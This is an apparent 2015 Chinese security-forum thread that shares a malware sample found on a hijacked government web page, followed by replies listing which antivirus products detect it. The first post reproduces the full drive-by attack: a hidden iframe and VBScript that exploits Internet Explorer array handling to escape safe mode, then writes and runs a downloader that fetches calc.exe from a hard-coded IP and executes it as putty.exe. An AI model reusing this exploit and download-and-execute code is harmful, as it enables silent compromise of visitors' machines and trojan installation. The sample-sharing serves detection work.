calc.exe

显示全部楼层 · 发表于 2015-4-30 22:09:39

挂马页面：hxxp://nyj.longmen.gov.cn/onews.asp?id=369

[mw_shl_code=html,true]<SCRIPT LANGUAGE="Javascript">

</SCRIPT>[/mw_shl_code]

[mw_shl_code=html,true]<iframe src=http://220.128.95.71 width=0 height=0></iframe>[/mw_shl_code]

[mw_shl_code=html,true]<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>[/mw_shl_code]

[mw_shl_code=html,true]<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c echo >>c:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>c:\text.vbs xPost.Open ""GET"",""http://220.128.95.71/calc.exe"",0 & echo >>c:\text.vbs xPost.Send() & echo >>c:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>c:\text.vbs sGet.Mode=3 & echo >>c:\text.vbs sGet.Type=1 & echo >>c:\text.vbs sGet.Open() & echo >>c:\text.vbs sGet.Write xPost.ResponseBody & echo >>c:\text.vbs sGet.SaveToFile ""c:\putty.exe"",2",0
objWsh.run "cscript.exe c:\text.vbs",0,true
wscript.sleep 10000
objWsh.run "c:\putty.exe"
document.write(Err.Description)
end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0) then
   exit function
  end if

  if (instr(info,"MSIE")>0) then
         intVersion = CInt(Mid(info, InStr(info, "MSIE") 5, 2))
  else
   exit function

  end if

  win9x=0

  BeginInit()
  If Create()=True Then
   myarray=       chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
   myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

   if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
   else
      setnotsafemode()
   end if
  end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13 17*rnd(6)
a3=7 3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
If Over()=True Then
' document.write(i)
   Create=True
   Exit For
End If
  Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
   i=testaa
   i=null
   redim  Preserve aa(a2)

   ab(0)=0
   aa(a1)=i
   ab(0)=6.36598737437801E-314

   aa(a1 2)=myarray
   ab(2)=1.74088534731324E-310
   mydata=aa(a1)
   redim  Preserve aa(a0)
end function

function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i 8)
i=readmemo(i 16)
j=readmemo(i &h134)
for k=0 to &h60 step 4
      j=readmemo(i &h120 k)
      if(j=14) then
            j=0
            redim  Preserve aa(a2)
   aa(a1 2)(i &h11c k)=ab(4)
            redim  Preserve aa(a0)

   j=0
            j=readmemo(i &h120 k)

            Exit for
         end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0 a3
a1=a0 2
a2=a0 &h8000000

redim  Preserve aa(a0)
redim ab(a0)

redim  Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
   if(intVersion<4) then
         mem=cint(a0 1)*16
         j=vartype(aa(a1-1))
         if((j=mem 4) or (j*8=mem 8)) then
            if(vartype(aa(a1-1))<>0)  Then
               If(IsObject(aa(a1)) = False ) Then
               type1=VarType(aa(a1))
               end if
            end if
         else
         redim  Preserve aa(a0)
         exit  function

         end if
      else
         if(vartype(aa(a1-1))<>0)  Then
            If(IsObject(aa(a1)) = False ) Then
               type1=VarType(aa(a1))
            end if
         end if
      end if
end if


If(type1=&h2f66) Then
      Over=True
End If
If(type1=&hB9AD) Then
      Over=True
      win9x=1
End If

redim  Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim  Preserve aa(a2)

ab(0)=0
aa(a1)=add 4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim  Preserve aa(a0)
end function

</script>

</body>
</html>[/mw_shl_code]

[mw_shl_code=html,true]http://220.128.95.71/calc.exe[/mw_shl_code]

样本文件：

显示全部楼层 · 发表于 2015-4-30 22:11:13

ess–enu

显示全部楼层 · 发表于 2015-4-30 22:11:59

ESS-CH killed.

calc.exe - Win32/Hupigon 特洛伊木马的变种

显示全部楼层 · 发表于 2015-4-30 22:13:05

金山杀exe

显示全部楼层 · 发表于 2015-4-30 22:15:49

本帖最后由学雷锋做人于 2015-4-30 22:24 编辑

360安全卫士(关伞)：2个

FD：1个

显示全部楼层 · 发表于 2015-4-30 22:17:08

卡巴kill

显示全部楼层 · 发表于 2015-4-30 22:25:00

火绒杀exe~

显示全部楼层 · 发表于 2015-4-30 22:27:28

bd杀exe和html

显示全部楼层 · 发表于 2015-4-30 22:30:20

本帖最后由 aboringman 于 2015-5-1 10:41 编辑

[mw_shl_code=css,true]When accessing data from the URL, "http://220.128.95.71/"
a virus or unwanted program 'HTML/ExpKit.Gen2' [virus] was found.
Action taken: Blocked file
[/mw_shl_code]

样本：
[mw_shl_code=css,true]The file 'C:\Documents and Settings\adminstartor\桌面\calc.exe\index.html'
contained a virus or unwanted program 'HTML/ExpKit.Gen2' [virus]
Action(s) taken:
The file was moved to the quarantine directory under the name '51df984c.qua'![/mw_shl_code]
[mw_shl_code=css,true]Virus or unwanted program 'DR/Delphi.Gen [dropper]'
detected in file 'C:\Documents and Settings\adminstartor\桌面\calc.exe\calc.exe.
Action performed: Deny access[/mw_shl_code]

补充：除首页外，其他页面皆报。

显示全部楼层 · 发表于 2015-4-30 22:34:19

[病毒样本] calc.exe

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块